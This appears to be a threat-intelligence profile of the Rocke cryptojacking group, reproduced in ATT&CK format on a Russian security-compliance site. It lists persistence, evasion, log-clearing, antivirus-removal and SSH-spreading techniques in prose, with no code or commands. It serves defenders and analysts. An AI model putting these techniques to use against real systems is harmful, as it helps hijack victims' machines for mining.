Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

Rocke

Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)
ID: G0106
Associated Groups: 
Version: 1.0
Created: 26 May 2020
Last Modified: 19 Jun 2020

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)

.006 Command and Scripting Interpreter: Python

Rocke has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)

Enterprise T1543 .002 Create or Modify System Process: Systemd Service

Rocke has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

Rocke has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

Rocke downloaded a file "libprocesshider", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

Enterprise T1574 .006 Hijack Execution Flow: Dynamic Linker Hijacking

Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Rocke used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

.004 Impair Defenses: Disable or Modify System Firewall

Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)

Enterprise T1070 .002 Indicator Removal: Clear Linux or Mac System Logs

Rocke has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)

.004 Indicator Removal: File Deletion

Rocke has deleted files on infected machines.(Citation: Anomali Rocke March 2019)

.006 Indicator Removal: Timestomp

Rocke has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)

Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

Rocke has used shell scripts which download mining executables and saves them with the filename "java".(Citation: Talos Rocke August 2018)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)

.004 Obfuscated Files or Information: Compile After Delivery

Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)

Enterprise T1055 .002 Process Injection: Portable Executable Injection

Rocke's miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)

Enterprise T1021 .004 Remote Services: SSH

Rocke has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)

Enterprise T1053 .003 Scheduled Task/Job: Cron

Rocke installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

Rocke used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)

Enterprise T1552 .004 Unsecured Credentials: Private Keys

Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)

Enterprise T1102 .001 Web Service: Dead Drop Resolver

Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)

Software

ID Name References Techniques

References